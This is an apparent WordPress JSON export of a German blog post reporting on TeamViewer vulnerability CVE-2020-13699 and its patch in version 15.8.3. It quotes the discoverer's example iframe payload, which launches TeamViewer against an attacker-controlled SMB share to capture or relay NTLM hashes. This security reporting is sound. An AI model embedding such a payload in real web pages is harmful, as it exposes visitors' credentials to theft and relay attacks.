{"id":234302,"date":"2020-08-10T00:04:00","date_gmt":"2020-08-09T22:04:00","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=234302"},"modified":"2020-11-30T12:02:05","modified_gmt":"2020-11-30T11:02:05","slug":"teamviewer-patch-verhindert-ungewollten-zugriff-auf-pc","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2020\/08\/10\/teamviewer-patch-verhindert-ungewollten-zugriff-auf-pc\/","title":{"rendered":"TeamViewer: Patch verhindert ungewollten Zugriff auf PC"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline\" src=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2015\/01\/Schutz.jpg\" width=\"40\" align=\"left\" height=\"47\"\/>[<a href=\"https:\/\/borncity.com\/win\/2020\/08\/10\/teamviewer-patch-closes-vulnerability-cve-2020-13699-on-pc\/\" target=\"_blank\" rel=\"noopener noreferrer\">English<\/a>]In \u00e4lteren Versionen der Remote-Zugriffs-Software TeamViewer gab es eine Schwachstelle. Diese erm\u00f6glichte es Dritten unbemerkt eine Verbindung zum jeweiligen PC aufzubauen. Die Schwachstelle wurde durch einen Patch beseitigt.<\/p>\n<p><!--more--><\/p>\n<h2>Die Schwachstelle CVE-2020-13699<\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" src=\"https:\/\/vg05.met.vgwort.de\/na\/0f7a44d7bd164c8fbf06610cf5764344\" width=\"1\" height=\"1\"\/>Die Schwachstelle <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-13699\">CVE-2020-13699<\/a> betraf den TeamViewer Desktop f\u00fcr Windowsbis zur Version 15.8.2. Die Software zitiert seine benutzerdefinierten URI-Handler nicht korrekt. Eine b\u00f6sartige Website konnte den TeamViewer mit beliebigen Parametern starten, wie:<\/p>\n<p><em>teamviewer10: &#8211;play URL<\/em><\/p>\n<p>Die erm\u00f6glichtes es einem Angreifer ein Opfer zu zwingen, eine NTLM-Authentifizierungsanforderung zu senden und entweder die Anforderung weiterzuleiten oder den Hash zum Offline-Kennwort-Knacken zu erfassen. Der Entdecker der Schwachstelle beschreibt diese <a href=\"https:\/\/web.archive.org\/web\/20201002193825\/https:\/\/jeffs.sh\/CVEs\/CVE-2020-13699.txt\" target=\"_blank\" rel=\"noopener noreferrer\">hier<\/a> folgenderma\u00dfen. <\/p>\n<blockquote>\n<p>An attacker could embed a malicious iframe in a website with a crafted URL:<\/p>\n<p>&lt;iframe src=\"teamviewer10: &#8211;play \\\\attacker-IP\\share\\fake.tvs\"&gt;<\/p>\n<p>that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking). <\/p>\n<\/blockquote>\n<p>Das k\u00f6nnte bei Watering Hole-Angriffen benutzt werden, um unbemerkt eine Verbindung aufzunehmen, wie man <a href=\"https:\/\/www.helpnetsecurity.com\/2020\/08\/06\/cve-2020-13699\/\" target=\"_blank\" rel=\"noopener noreferrer\">hier nachlesen<\/a> kann. Dabei ist nicht einmal ein Passwort erforderlich. Allerdings gibt es bisher keine Anzeichen, dass die Schwachstelle ausgenutzt wird. <\/p>\n<h2>Update auf TeamViewer Version 15.8.3<\/h2>\n<p>Bei Bleeping Computer habe ich <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/teamviewer-fixes-bug-that-lets-attackers-access-your-pc\/\" target=\"_blank\" rel=\"noopener noreferrer\">hier mitbekommen<\/a>, dass es ein Update des TeamViewer auf die Version 15.8.3 gab, das die Schwachstelle schlie\u00dft. Allerdings hat der Anbieter vor ca. 2 Wochen das Update in <a href=\"https:\/\/community.teamviewer.com\/t5\/Announcements\/Statement-on-CVE-2020-13699\/m-p\/99129\" target=\"_blank\" rel=\"noopener noreferrer\">diesem Community-Beitrag<\/a> angek\u00fcndigt. <\/p>\n<blockquote>\n<h4>\n<p>Statement on CVE 2020-13699  <\/p>\n<p>Today we are releasing some updates for TeamViewer 8 through 15, for the Windows platform.  <\/p>\n<p>We implemented some improvements in URI handling relating to CVE 2020-13699.<\/p>\n<\/h4>\n<\/blockquote>\n<p><font size=\"3\">Die \u00c4nderungen sind im <a href=\"https:\/\/community.teamviewer.com\/t5\/Change-Logs\/bd-p\/Change_Logs_EN\" target=\"_blank\" rel=\"noopener noreferrer\">Changelog nachlesbar<\/a>. <\/font><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[English]In \u00e4lteren Versionen der Remote-Zugriffs-Software TeamViewer gab es eine Schwachstelle. Diese erm\u00f6glichte es Dritten unbemerkt eine Verbindung zum jeweiligen PC aufzubauen. Die Schwachstelle wurde durch einen Patch beseitigt.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[426,7459,185],"tags":[4328,2795],"class_list":["post-234302","post","type-post","status-publish","format-standard","hentry","category-sicherheit","category-software","category-update","tag-sicherheit","tag-teamviewer"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/234302","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=234302"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/234302\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=234302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=234302"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=234302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}